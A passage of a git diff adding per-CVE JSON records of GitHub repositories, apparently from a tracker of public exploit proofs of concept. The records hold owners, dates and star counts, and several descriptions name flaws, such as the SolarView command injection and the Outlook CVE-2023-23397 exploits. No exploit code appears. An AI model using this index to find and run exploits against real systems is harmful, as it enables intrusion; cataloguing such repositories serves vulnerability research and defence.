"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 848853200, + "name": "CVE-2023-22809-Exploiter", + "full_name": "D0rDa4aN919\/CVE-2023-22809-Exploiter", + "owner": { + "login": "D0rDa4aN919", + "id": 108623675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108623675?v=4", + "html_url": "https:\/\/github.com\/D0rDa4aN919", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D0rDa4aN919\/CVE-2023-22809-Exploiter", + "description": null, + "fork": false, + "created_at": "2024-08-28T14:22:53Z", + "updated_at": "2024-09-06T08:25:06Z", + "pushed_at": "2024-09-06T08:25:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22855.json b/2023/CVE-2023-22855.json new file mode 100644 index 0000000000..60b18a6145 --- /dev/null +++ b/2023/CVE-2023-22855.json @@ -0,0 +1,33 @@ +[ + { + "id": 703592151, + "name": "CVE-2023-22855", + "full_name": "vianic\/CVE-2023-22855", + "owner": { + "login": "vianic", + "id": 61748137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4", + "html_url": "https:\/\/github.com\/vianic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vianic\/CVE-2023-22855", + "description": "Security Vulnerability - Kardex Mlog MCC", + "fork": false, + "created_at": "2023-10-11T14:27:08Z", + "updated_at": "2023-10-11T14:27:09Z", + "pushed_at": "2023-10-11T14:34:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22884.json b/2023/CVE-2023-22884.json new file mode 100644 index 0000000000..6af404a6e4 --- /dev/null +++ b/2023/CVE-2023-22884.json @@ -0,0 +1,33 @@ +[ + { + "id": 672206923, + "name": "CVE-2023-22884-Airflow-SQLi", + "full_name": "jakabakos\/CVE-2023-22884-Airflow-SQLi", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-22884-Airflow-SQLi", + "description": "CVE-2023-22884 PoC", + "fork": false, + "created_at": "2023-07-29T09:26:36Z", + "updated_at": "2024-10-21T10:38:56Z", + "pushed_at": "2023-09-07T08:36:47Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22894.json b/2023/CVE-2023-22894.json new file mode 100644 index 0000000000..5e496ec42f --- /dev/null +++ b/2023/CVE-2023-22894.json @@ -0,0 +1,33 @@ +[ + { + "id": 632200273, + "name": "CVE-2023-22894", + "full_name": "Saboor-Hakimi\/CVE-2023-22894", + "owner": { + "login": "Saboor-Hakimi", + "id": 44523544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44523544?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi\/CVE-2023-22894", + "description": "CVE-2023-22894", + "fork": false, + "created_at": "2023-04-24T23:26:13Z", + "updated_at": "2024-11-18T02:00:29Z", + "pushed_at": "2023-04-24T23:38:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22906.json b/2023/CVE-2023-22906.json new file mode 100644 index 0000000000..23c1872282 --- /dev/null +++ b/2023/CVE-2023-22906.json @@ -0,0 +1,37 @@ +[ + { + "id": 635964756, + "name": "CVE-2023-22906", + "full_name": "nonamecoder\/CVE-2023-22906", + "owner": { + "login": "nonamecoder", + "id": 5160055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5160055?v=4", + "html_url": "https:\/\/github.com\/nonamecoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nonamecoder\/CVE-2023-22906", + "description": "Proof of Concept for CVE-2023-22906", + "fork": false, + "created_at": "2023-05-03T20:52:19Z", + "updated_at": "2024-04-20T01:38:57Z", + "pushed_at": "2023-07-08T23:15:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "iot", + "security", + "vulnerability-research" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22941.json b/2023/CVE-2023-22941.json new file mode 100644 index 0000000000..d222570af9 --- /dev/null +++ b/2023/CVE-2023-22941.json @@ -0,0 +1,33 @@ +[ + { + "id": 603212493, + "name": "CVE-2023-22941", + "full_name": "eduardosantos1989\/CVE-2023-22941", + "owner": { + "login": "eduardosantos1989", + "id": 24944919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24944919?v=4", + "html_url": "https:\/\/github.com\/eduardosantos1989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eduardosantos1989\/CVE-2023-22941", + "description": "In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a [Field Transformation](https:\/\/docs.splunk.com\/Documentation\/Splunk\/latest\/Knowledge\/Managefieldtransforms) crashes the Splunk daemon (splunkd). CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-02-17T21:26:05Z", + "updated_at": "2023-02-20T16:30:21Z", + "pushed_at": "2023-02-17T21:27:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22960.json b/2023/CVE-2023-22960.json new file mode 100644 index 0000000000..c894dc2986 --- /dev/null +++ b/2023/CVE-2023-22960.json @@ -0,0 +1,40 @@ +[ + { + "id": 592657918, + "name": "CVE-2023-22960", + "full_name": "t3l3machus\/CVE-2023-22960", + "owner": { + "login": "t3l3machus", + "id": 75489922, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75489922?v=4", + "html_url": "https:\/\/github.com\/t3l3machus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3l3machus\/CVE-2023-22960", + "description": "This vulnerability allows an attacker to bypass the credentials brute-force prevention mechanism of the Embedded Web Server (interface) of more than 60 Lexmark printer models. This issue affects both username-password and PIN authentication.", + "fork": false, + "created_at": "2023-01-24T08:33:19Z", + "updated_at": "2024-11-25T12:03:38Z", + "pushed_at": "2024-07-19T06:36:55Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bruteforce", + "cve-2023-22960", + "hacking", + "password-attack", + "pentesting", + "redteam" + ], + "visibility": "public", + "forks": 16, + "watchers": 85, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22974.json b/2023/CVE-2023-22974.json new file mode 100644 index 0000000000..e88084dfef --- /dev/null +++ b/2023/CVE-2023-22974.json @@ -0,0 +1,33 @@ +[ + { + "id": 605704470, + "name": "CVE-2023-22974", + "full_name": "gbrsh\/CVE-2023-22974", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-22974", + "description": "OpenEMR < 7.0.0 Arbitrary File Read", + "fork": false, + "created_at": "2023-02-23T18:14:05Z", + "updated_at": "2024-01-04T23:28:14Z", + "pushed_at": "2023-02-23T18:15:34Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23138.json b/2023/CVE-2023-23138.json new file mode 100644 index 0000000000..6016ff75a2 --- /dev/null +++ b/2023/CVE-2023-23138.json @@ -0,0 +1,33 @@ +[ + { + "id": 585149215, + "name": "CVE-2023-23138", + "full_name": "OmarAtallahh\/CVE-2023-23138", + "owner": { + "login": "OmarAtallahh", + "id": 42843641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42843641?v=4", + "html_url": "https:\/\/github.com\/OmarAtallahh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OmarAtallahh\/CVE-2023-23138", + "description": "short view of ruby on rails properties misconfiguration ", + "fork": false, + "created_at": "2023-01-04T12:51:33Z", + "updated_at": "2023-03-08T18:48:45Z", + "pushed_at": "2023-03-06T22:10:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23169.json b/2023/CVE-2023-23169.json new file mode 100644 index 0000000000..4f7a9b4670 --- /dev/null +++ b/2023/CVE-2023-23169.json @@ -0,0 +1,33 @@ +[ + { + "id": 634830191, + "name": "CVE-2023-23169", + "full_name": "S4nshine\/CVE-2023-23169", + "owner": { + "login": "S4nshine", + "id": 11758455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11758455?v=4", + "html_url": "https:\/\/github.com\/S4nshine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4nshine\/CVE-2023-23169", + "description": null, + "fork": false, + "created_at": "2023-05-01T10:06:44Z", + "updated_at": "2023-05-03T06:23:48Z", + "pushed_at": "2023-05-01T10:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23192.json b/2023/CVE-2023-23192.json new file mode 100644 index 0000000000..5b75dadefa --- /dev/null +++ b/2023/CVE-2023-23192.json @@ -0,0 +1,64 @@ +[ + { + "id": 616350414, + "name": "CVE-2023-23192", + "full_name": "pinarsadioglu\/CVE-2023-23192", + "owner": { + "login": "pinarsadioglu", + "id": 18392750, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18392750?v=4", + "html_url": "https:\/\/github.com\/pinarsadioglu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinarsadioglu\/CVE-2023-23192", + "description": "CVE-2023-23192", + "fork": false, + "created_at": "2023-03-20T08:06:55Z", + "updated_at": "2024-02-02T09:11:31Z", + "pushed_at": "2023-03-27T07:42:56Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616394169, + "name": "CVE-2023-23192", + "full_name": "Penkyzduyi\/CVE-2023-23192", + "owner": { + "login": "Penkyzduyi", + "id": 69184246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69184246?v=4", + "html_url": "https:\/\/github.com\/Penkyzduyi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Penkyzduyi\/CVE-2023-23192", + "description": "CVE-2023-23192 test ", + "fork": false, + "created_at": "2023-03-20T09:59:39Z", + "updated_at": "2023-03-20T09:59:39Z", + "pushed_at": "2023-03-20T09:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23279.json b/2023/CVE-2023-23279.json new file mode 100644 index 0000000000..0532eec32e --- /dev/null +++ b/2023/CVE-2023-23279.json @@ -0,0 +1,33 @@ +[ + { + "id": 613478267, + "name": "CVE-2023-23279", + "full_name": "tuannq2299\/CVE-2023-23279", + "owner": { + "login": "tuannq2299", + "id": 66456080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66456080?v=4", + "html_url": "https:\/\/github.com\/tuannq2299", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuannq2299\/CVE-2023-23279", + "description": null, + "fork": false, + "created_at": "2023-03-13T16:39:31Z", + "updated_at": "2023-03-14T14:38:40Z", + "pushed_at": "2023-03-13T16:43:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23333.json b/2023/CVE-2023-23333.json new file mode 100644 index 0000000000..d1774a462e --- /dev/null +++ b/2023/CVE-2023-23333.json @@ -0,0 +1,95 @@ +[ + { + "id": 597984195, + "name": "CVE-2023-23333", + "full_name": "Timorlover\/CVE-2023-23333", + "owner": { + "login": "Timorlover", + "id": 116296194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116296194?v=4", + "html_url": "https:\/\/github.com\/Timorlover", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Timorlover\/CVE-2023-23333", + "description": "There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.", + "fork": false, + "created_at": "2023-02-06T06:20:40Z", + "updated_at": "2023-07-13T20:44:04Z", + "pushed_at": "2023-02-06T06:35:29Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 654621817, + "name": "CVE-2023-23333", + "full_name": "Mr-xn\/CVE-2023-23333", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-23333", + "description": "SolarView Compact through 6.00 downloader.php commands injection (RCE) nuclei-templates", + "fork": false, + "created_at": "2023-06-16T14:33:31Z", + "updated_at": "2024-06-21T00:11:12Z", + "pushed_at": "2023-06-16T14:40:00Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673443044, + "name": "nmap-CVE-2023-23333-exploit", + "full_name": "emanueldosreis\/nmap-CVE-2023-23333-exploit", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/nmap-CVE-2023-23333-exploit", + "description": "Nmap NSE script to dump \/ test Solarwinds CVE-2023-23333 vulnerability", + "fork": false, + "created_at": "2023-08-01T16:24:37Z", + "updated_at": "2024-06-06T21:51:33Z", + "pushed_at": "2023-08-01T16:36:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23388.json b/2023/CVE-2023-23388.json new file mode 100644 index 0000000000..839cdee530 --- /dev/null +++ b/2023/CVE-2023-23388.json @@ -0,0 +1,33 @@ +[ + { + "id": 819107258, + "name": "CVE-2023-23388", + "full_name": "ynwarcs\/CVE-2023-23388", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-23388", + "description": "poc for CVE-2023-23388 (LPE in Windows 10\/11 bthserv service)", + "fork": false, + "created_at": "2024-06-23T19:52:09Z", + "updated_at": "2024-11-15T18:06:59Z", + "pushed_at": "2024-07-17T12:25:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23396.json b/2023/CVE-2023-23396.json new file mode 100644 index 0000000000..d18baa8bab --- /dev/null +++ b/2023/CVE-2023-23396.json @@ -0,0 +1,53 @@ +[ + { + "id": 614972218, + "name": "CVE-2023-23396", + "full_name": "LucaBarile\/CVE-2023-23396", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2023-23396", + "description": "Exploit and report for CVE-2023-23396.", + "fork": false, + "created_at": "2023-03-16T17:28:27Z", + "updated_at": "2023-08-17T12:00:39Z", + "pushed_at": "2023-04-07T12:03:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23396", + "denial-of-service", + "disclosure", + "excel-exploit", + "exploit", + "full-disclosure", + "kb5002356", + "kb5002362", + "microsoft-excel", + "office-365", + "paper", + "poc", + "proof-of-concept", + "report", + "vulnerability", + "vulnerability-disclosure", + "white-paper", + "write-up", + "writeup" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23397.json b/2023/CVE-2023-23397.json new file mode 100644 index 0000000000..85cfc3ad11 --- /dev/null +++ b/2023/CVE-2023-23397.json @@ -0,0 +1,919 @@ +[ + { + "id": 614479263, + "name": "CVE-2023-23397_EXPLOIT_0DAY", + "full_name": "sqrtZeroKnowledge\/CVE-2023-23397_EXPLOIT_0DAY", + "owner": { + "login": "sqrtZeroKnowledge", + "id": 31594437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31594437?v=4", + "html_url": "https:\/\/github.com\/sqrtZeroKnowledge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sqrtZeroKnowledge\/CVE-2023-23397_EXPLOIT_0DAY", + "description": "Exploit for the CVE-2023-23397", + "fork": false, + "created_at": "2023-03-15T17:03:38Z", + "updated_at": "2024-09-02T05:24:27Z", + "pushed_at": "2023-03-15T17:53:53Z", + "stargazers_count": 158, + "watchers_count": 158, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 158, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 614826916, + "name": "CVE-2023-23397", + "full_name": "j0eyv\/CVE-2023-23397", + "owner": { + "login": "j0eyv", + "id": 41282854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41282854?v=4", + "html_url": "https:\/\/github.com\/j0eyv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j0eyv\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-16T12:02:04Z", + "updated_at": "2023-03-16T15:18:48Z", + "pushed_at": "2023-03-16T12:04:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614882571, + "name": "CVE-2023-23397", + "full_name": "alicangnll\/CVE-2023-23397", + "owner": { + "login": "alicangnll", + "id": 23417905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23417905?v=4", + "html_url": "https:\/\/github.com\/alicangnll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alicangnll\/CVE-2023-23397", + "description": "CVE-2023-23397 - Microsoft Outlook Vulnerability", + "fork": false, + "created_at": "2023-03-16T14:07:15Z", + "updated_at": "2024-08-12T20:30:17Z", + "pushed_at": "2023-03-17T09:46:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614908297, + "name": "CVE-2023-23397", + "full_name": "grn-bogo\/CVE-2023-23397", + "owner": { + "login": "grn-bogo", + "id": 20979467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20979467?v=4", + "html_url": "https:\/\/github.com\/grn-bogo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grn-bogo\/CVE-2023-23397", + "description": "Python script to create a message with the vulenrability properties set", + "fork": false, + "created_at": "2023-03-16T15:00:26Z", + "updated_at": "2023-03-22T01:01:56Z", + "pushed_at": "2023-03-16T15:02:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615010757, + "name": "CVE-2023-23397", + "full_name": "ka7ana\/CVE-2023-23397", + "owner": { + "login": "ka7ana", + "id": 5593452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5593452?v=4", + "html_url": "https:\/\/github.com\/ka7ana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ka7ana\/CVE-2023-23397", + "description": "Simple PoC in PowerShell for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-16T19:10:37Z", + "updated_at": "2024-03-14T15:24:06Z", + "pushed_at": "2023-03-16T19:29:49Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23397", + "infosec", + "outlook", + "poc", + "powershell", + "powershell-script", + "proof-of-concept", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 11, + "watchers": 41, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615021806, + "name": "CVE-2023-23397-POC-Powershell", + "full_name": "api0cradle\/CVE-2023-23397-POC-Powershell", + "owner": { + "login": "api0cradle", + "id": 12997471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12997471?v=4", + "html_url": "https:\/\/github.com\/api0cradle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/api0cradle\/CVE-2023-23397-POC-Powershell", + "description": null, + "fork": false, + "created_at": "2023-03-16T19:43:39Z", + "updated_at": "2024-10-28T18:14:31Z", + "pushed_at": "2023-03-17T07:47:40Z", + "stargazers_count": 340, + "watchers_count": 340, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 340, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 615147191, + "name": "CVE-2023-23397", + "full_name": "im007\/CVE-2023-23397", + "owner": { + "login": "im007", + "id": 33734981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33734981?v=4", + "html_url": "https:\/\/github.com\/im007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im007\/CVE-2023-23397", + "description": "CVE-2023-23397 Remediation Script (Powershell)", + "fork": false, + "created_at": "2023-03-17T03:38:50Z", + "updated_at": "2023-03-17T03:43:08Z", + "pushed_at": "2023-03-17T18:56:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615197592, + "name": "CVE-2023-23397-PoC-PowerShell", + "full_name": "cleverg0d\/CVE-2023-23397-PoC-PowerShell", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2023-23397-PoC-PowerShell", + "description": "PoC for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-17T06:52:42Z", + "updated_at": "2023-03-27T17:45:53Z", + "pushed_at": "2023-03-17T07:36:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615270045, + "name": "CVE-2023-23397-POC", + "full_name": "ahmedkhlief\/CVE-2023-23397-POC", + "owner": { + "login": "ahmedkhlief", + "id": 24752712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24752712?v=4", + "html_url": "https:\/\/github.com\/ahmedkhlief", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmedkhlief\/CVE-2023-23397-POC", + "description": "Exploit POC for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-17T10:18:26Z", + "updated_at": "2023-07-19T08:51:01Z", + "pushed_at": "2023-03-17T12:58:55Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615437537, + "name": "CVE-2023-23397_EXPLOIT", + "full_name": "BillSkiCO\/CVE-2023-23397_EXPLOIT", + "owner": { + "login": "BillSkiCO", + "id": 11514515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11514515?v=4", + "html_url": "https:\/\/github.com\/BillSkiCO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BillSkiCO\/CVE-2023-23397_EXPLOIT", + "description": "Generates meeting requests taking advantage of CVE-2023-23397. This requires the outlook thick client to send.", + "fork": false, + "created_at": "2023-03-17T17:35:14Z", + "updated_at": "2024-10-21T05:41:44Z", + "pushed_at": "2023-03-17T19:19:00Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 615848571, + "name": "CVE-2023-23397-PoC", + "full_name": "djackreuter\/CVE-2023-23397-PoC", + "owner": { + "login": "djackreuter", + "id": 27731554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27731554?v=4", + "html_url": "https:\/\/github.com\/djackreuter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/djackreuter\/CVE-2023-23397-PoC", + "description": null, + "fork": false, + "created_at": "2023-03-18T21:14:21Z", + "updated_at": "2024-01-02T19:38:28Z", + "pushed_at": "2023-03-18T21:24:56Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615855021, + "name": "CVE-2023-23397", + "full_name": "moneertv\/CVE-2023-23397", + "owner": { + "login": "moneertv", + "id": 67332723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67332723?v=4", + "html_url": "https:\/\/github.com\/moneertv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moneertv\/CVE-2023-23397", + "description": "CVE-2023-23397 C# PoC ", + "fork": false, + "created_at": "2023-03-18T21:44:46Z", + 